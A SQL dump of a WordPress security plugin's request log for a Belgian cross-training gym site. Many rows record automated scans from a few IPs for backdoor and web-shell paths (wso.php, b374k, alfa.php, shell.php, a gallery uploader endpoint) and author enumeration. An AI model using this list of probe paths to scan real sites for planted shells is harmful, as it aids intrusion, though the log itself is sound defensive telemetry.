(70157, 1492707892.178824, 1538594463, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G903F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(70158, 1492708082.764407, 3024883481, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(70159, 1492709883.469761, 1538655959, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.fr/', 'Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG GT-I9515 Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(70160, 1492710755.102871, 1338304824, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70161, 1492715686.624826, 1338304824, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70162, 1492715944.455652, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php', 'http://crosstrainingcenter.be/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(70163, 1492717736.043832, 1123633542, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70164, 1492719367.072537, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(70165, 1492719371.095461, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(70166, 1492720433.897859, 1550331697, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(70167, 1492720455.564470, 1550331697, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(70168, 1492720465.620782, 1550331697, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(70169, 1492721197.331953, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70170, 1492721197.813074, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70171, 1492721198.230576, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70172, 1492721198.701131, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70173, 1492721199.241773, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70174, 1492721199.657215, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70175, 1492721200.412933, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70176, 1492721200.870825, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(70177, 1492721201.295711, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70178, 1492721201.698814, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70179, 1492721202.108589, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70180, 1492721202.581228, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70181, 1492721203.011784, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70182, 1492721203.449569, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70183, 1492724317.949275, 1338304824, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70184, 1492724560.907113, 96767447, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/dropbox-backup/img/icon.png', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),
(70185, 1492728543.687013, 676177827, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70186, 1492728573.850623, 2637637505, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70187, 1492728908.914970, 2960257761, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/img.php', '', ''),
(70188, 1492732565.450213, 3024883597, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(70189, 1492734294.675808, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/img.php', '', ''),
(70190, 1492735762.927544, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/readme.php', '', ''),
(70191, 1492736033.394672, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/config.php', '', ''),
(70192, 1492738213.314219, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp.php', '', ''),
(70193, 1492738440.316468, 3475901887, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70194, 1492738933.824139, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/403.php', '', ''),
(70195, 1492739469.945547, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-logs.php', '', ''),
(70196, 1492739819.859178, 1123633555, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70197, 1492739820.390648, 1123633555, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70198, 1492740124.033032, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/security.php', '', ''),
(70199, 1492740132.328448, 3475901862, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70200, 1492741411.401182, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/style.php', '', ''),
(70201, 1492741543.542797, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/wp-error.php', '', ''),
(70202, 1492741650.517075, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/web-info.php', '', ''),
(70203, 1492742326.098032, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/akismet/wah.php', '', ''),
(70204, 1492742557.557017, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/cache.php', '', ''),
(70205, 1492742757.676790, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/mssqli.php', '', ''),
(70206, 1492742773.718880, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/404.php', '', ''),
(70207, 1492743904.631013, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/xml.php', '', ''),
(70208, 1492745221.745715, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/b374k-2.8.php', '', ''),
(70209, 1492746648.004688, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70210, 1492746648.549361, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70211, 1492747188.746126, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/web-more.php', '', ''),
(70212, 1492747371.344437, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/ms-post.php', '', ''),
(70213, 1492748395.308093, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/info.php', '', ''),
(70214, 1492748482.229439, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/twentyfourteen/404.php', '', ''),
(70215, 1492749452.477435, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/vent-fitness/help.php', '', ''),
(70216, 1492749755.978472, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-searches.php', '', ''),
(70217, 1492750214.891070, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/wp-security.php', '', ''),
(70218, 1492751032.891094, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/support.php', '', ''),
(70219, 1492751333.003580, 3475901864, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70220, 1492751403.914697, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-updates.php', '', ''),
(70221, 1492752883.056551, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/load-config.php', '', ''),
(70222, 1492754854.810061, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70223, 1492754855.490651, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70224, 1492754855.942924, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70225, 1492754856.413646, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70226, 1492754856.864477, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70227, 1492754857.319680, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70228, 1492754857.823859, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70229, 1492754858.255111, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70230, 1492754858.698710, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70231, 1492754859.211802, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70232, 1492754859.639139, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70233, 1492755607.178691, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/phpini.php', '', ''),
(70234, 1492756019.712452, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/xml1-wp2.php', '', ''),
(70235, 1492756652.635809, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-conf.php', '', ''),
(70236, 1492756948.725244, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/404.php', '', ''),
(70237, 1492758148.191829, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/security.php', '', ''),
(70238, 1492758210.685638, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/gallery.php', '', ''),
(70239, 1492759145.713877, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/alfa.php', '', ''),
(70240, 1492759503.939819, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/mainik.php', '', ''),
(70241, 1492760512.525035, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/config.php', '', ''),
(70242, 1492761115.938635, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/license.php', '', ''),
(70243, 1492763580.670147, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(70244, 1492763584.273459, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(70245, 1492763643.828281, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(70246, 1492763904.892236, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/sh.php', '', ''),
(70247, 1492764006.809322, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.php', '', ''),
(70248, 1492764994.535289, 1838119706, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70249, 1492764997.697118, 1838119706, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70250, 1492765000.093137, 1838119706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70251, 1492765001.150851, 1838119706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70252, 1492765002.057436, 1838119706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70253, 1492765004.543158, 1838119706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70254, 1492765006.995058, 1838119706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70255, 1492765007.681850, 1838119706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70256, 1492765008.489272, 1838119706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70257, 1492765009.325373, 1838119706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70258, 1492765010.012884, 1838119706, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70259, 1492766289.203967, 3242976508, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&sqi=2&ved=0ahUKEwjZ3_Hgm7XTAhWmF8AKHQofDFIQFggwMAI&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(70260, 1492766738.581653, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/system.php', '', ''),
(70261, 1492767519.112642, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/twentyfifteen/functions.php', '', ''),
(70262, 1492768133.683820, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/tmp.php', '', ''),
(70263, 1492768623.414086, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/cachefix.php', '', ''),
(70264, 1492768696.760624, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/css/colors/ocean/ocean.php', '', ''),
(70265, 1492768737.342301, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/temp.php', '', ''),
(70266, 1492769116.441012, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/revslider/temp/update_extract/revslider/info.php', '', ''),
(70267, 1492769476.833448, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/plagmain.php', '', ''),
(70268, 1492770251.850982, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/backup.php', '', ''),
(70269, 1492771609.733153, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/lndex.php', '', ''),
(70270, 1492771620.104434, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/systemserver.php', '', ''),
(70271, 1492772535.847296, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/logs.php', '', ''),
(70272, 1492773413.826050, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/error.php', '', ''),
(70273, 1492773431.969478, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sites.php', '', ''),
(70274, 1492773679.192739, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wso.php', '', ''),
(70275, 1492774383.728289, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/opts.php', '', ''),
(70276, 1492774471.953907, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes.php', '', ''),
(70277, 1492775105.870996, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-index.php', '', ''),
(70278, 1492775749.943252, 2960254742, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/logs.php', '', ''),
(70279, 1492778337.998425, 3164826652, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?author=%7Bnum:1%7D', 'http://www.crosstrainingcenter.be/?author=%7Bnum:1%7D', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(70280, 1492779670.248663, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/license.php', '', ''),
(70281, 1492779835.625718, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/pomo/was-wp.php', '', ''),
(70282, 1492780439.771276, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/update-wp.php', '', ''),
(70283, 1492781284.130331, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/cacheplugin.php', '', ''),
(70284, 1492781974.081140, 872366397, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(70285, 1492782012.049565, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(70286, 1492782099.041082, 787193540, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; Ypkch32; rv:11.0) like Gecko'),
(70287, 1492782099.690809, 3570102226, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0ahUKEwiWxJum1rXTAhXB6xoKHVwHBzIQFghbMAk&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2Fles-seances-namur%2F&usg=AFQjCNF3CZXOTpgEhukKBcCq_alqy9J0kw', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; Ypkch32; rv:11.0) like Gecko');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(70288, 1492782102.373439, 3570102226, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; Ypkch32; rv:11.0) like Gecko'),
(70289, 1492782505.734080, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/wp-load.php', '', ''),
(70290, 1492783308.891067, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/plugin.php', '', ''),
(70291, 1492783342.265742, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/cache.php', '', ''),
(70292, 1492783810.150408, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/wp-xmpp.php', '', ''),
(70293, 1492784316.646335, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/maink.php', '', ''),
(70294, 1492784375.905937, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/help.php', '', ''),
(70295, 1492784784.697161, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sh.php', '', ''),
(70296, 1492786290.025298, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/twentytwelve/help.php', '', ''),
(70297, 1492786646.226254, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/Iicense.php?wso', '', ''),
(70298, 1492787686.605827, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.php', '', ''),
(70299, 1492788417.529468, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/wp-config-sample.php', '', ''),
(70300, 1492788759.926261, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-credits.php', '', ''),
(70301, 1492789176.610042, 3475901863, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70302, 1492790042.399917, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/web.php', '', ''),
(70303, 1492790239.497280, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-engines.php', '', ''),
(70304, 1492791407.752377, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/setup.php', '', ''),
(70305, 1492792838.141465, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/shell.php', '', ''),
(70306, 1492792998.076480, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/security-e.php', '', ''),
(70307, 1492794619.655727, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-error.php', '', ''),
(70308, 1492795488.428125, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/error_log.php', '', ''),
(70309, 1492795840.245081, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/file.php', '', ''),
(70310, 1492797113.322818, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/tmp.php', '', ''),
(70311, 1492799363.478940, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/js.php', '', ''),
(70312, 1492799713.162818, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/syslib.php', '', ''),
(70313, 1492800588.339598, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/security.php', '', ''),
(70314, 1492801316.202321, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/web-systems.php', '', ''),
(70315, 1492801348.297486, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/wp-conf.php', '', ''),
